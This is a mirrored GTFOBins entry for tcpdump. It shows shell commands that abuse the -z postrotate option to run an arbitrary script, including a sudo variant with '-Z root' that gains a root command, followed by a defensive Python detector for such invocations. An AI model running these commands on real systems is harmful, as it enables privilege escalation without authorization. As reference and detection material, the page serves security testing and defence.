mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-18 17:49:29 +02:00
GTFOBins.github.io/_gtfobins/tcpdump.md
Syed Umar Arfeen c37da57373 Providing user as argument using -Z
For certain distributions running tcpdump without providing -Z (user) argument
causes the provided command to be executed as the `tcpdump` user which has low
privileges by default.
2019-09-23 04:04:05 +02:00

704 B

description:
  These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.
functions:
  command:
    code:
      COMMAND='id'
      TF=$(mktemp)
      echo "$COMMAND" > $TF
      chmod +x $TF
      tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
  sudo:
    code:
      COMMAND='id'
      TF=$(mktemp)
      echo "$COMMAND" > $TF
      chmod +x $TF
      sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
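For defenders, one way to flag the invocations above in process-execution logs. This is an added example, not part of GTFOBins; the allow-list, the finding labels and the sample command lines are assumptions constructed here.

```python
import shlex
from pathlib import PurePosixPath

# tcpdump short options that take a value, per tcpdump(8).
ARG_OPTS = set("BcCEFGijmMQrsTVwWyzZ")
# Assumption: the only -z targets expected on this host (exact match, not basename).
ALLOWED_POSTROTATE = {"gzip", "bzip2", "/usr/bin/gzip", "/usr/bin/bzip2"}
# Constructed sample command lines, as an exec audit log might record them.
SAMPLES = [
    "sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/tmp.Xy12Ab -Z root",
    "tcpdump -i eth0 -w /var/log/cap-%H.pcap -G 3600 -z gzip",
    "/usr/sbin/tcpdump -nlz/tmp/a port 53",
]

def parse_opts(args):
    """Collect value-taking short options, including clustered forms (-nlz/path)."""
    opts, i = {}, 0
    while i < len(args):
        tok = args[i]
        i += 1
        if tok == "--":
            break
        if not tok.startswith("-") or tok.startswith("--") or tok == "-":
            continue  # filter words / long options: keep scanning, getopt permutes
        for pos, ch in enumerate(tok[1:], start=1):
            if ch in ARG_OPTS:
                val = tok[pos + 1:]          # value glued to the option
                if not val and i < len(args):
                    val, i = args[i], i + 1  # value in the next token
                opts[ch] = val
                break
    return opts

def review(cmdline):
    # Locate tcpdump even when wrapped (sudo, absolute path).
    argv = shlex.split(cmdline)
    idx = next((n for n, a in enumerate(argv) if PurePosixPath(a).name == "tcpdump"), None)
    if idx is None:
        return []
    opts = parse_opts(argv[idx + 1:])
    findings = []
    z = opts.get("z")
    if z is not None and z not in ALLOWED_POSTROTATE:
        findings.append("postrotate-exec:" + z)  # -z runs an unexpected program
    if opts.get("Z") == "root":
        findings.append("keeps-root")            # -Z root disables the privilege drop
    return findings

if __name__ == "__main__":
    for line in SAMPLES:
        print(review(line), line)
```
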